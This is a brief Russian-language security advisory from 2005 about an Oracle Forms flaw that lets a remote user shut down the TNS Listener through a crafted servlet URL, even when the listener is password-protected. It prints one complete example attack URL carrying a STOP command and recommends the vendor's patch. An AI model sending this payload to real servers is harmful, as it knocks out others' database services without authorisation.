Повышение привилегий в Oracle Forms

Дата публикации:	10.10.2005
Всего просмотров:	1903
Опасность:	Средняя
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
	Уязвимые версии: Oracle Forms Описание: Уязвимость позволяет удаленному пользователю остановить процесс TNS Listener. Если TNS Listener защищен паролем, удаленный пользователь может с помощью специально сформированного URL остановить работу процесса. Пример: http://[target]:8888/forms90/f90servlet?form= test.fmx&userid=SCOTT/TIGER@(DESCRIPTION= (ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP) (HO ST=server)(PORT=1521)))(CONNECT_DATA= (COMMAND=STOP)(SERVICE=LISTENER)))& buffer_records=NO&debug_messages=NO&array=YES & query_only=NO&quiet=NO&RENDER=YES URL производителя: oracle.com Решение: Установите исправление с сайта производителя.
Ссылки:	Shutdown TNS Listener via Oracle Forms Servlet

Подпишитесь на email рассылку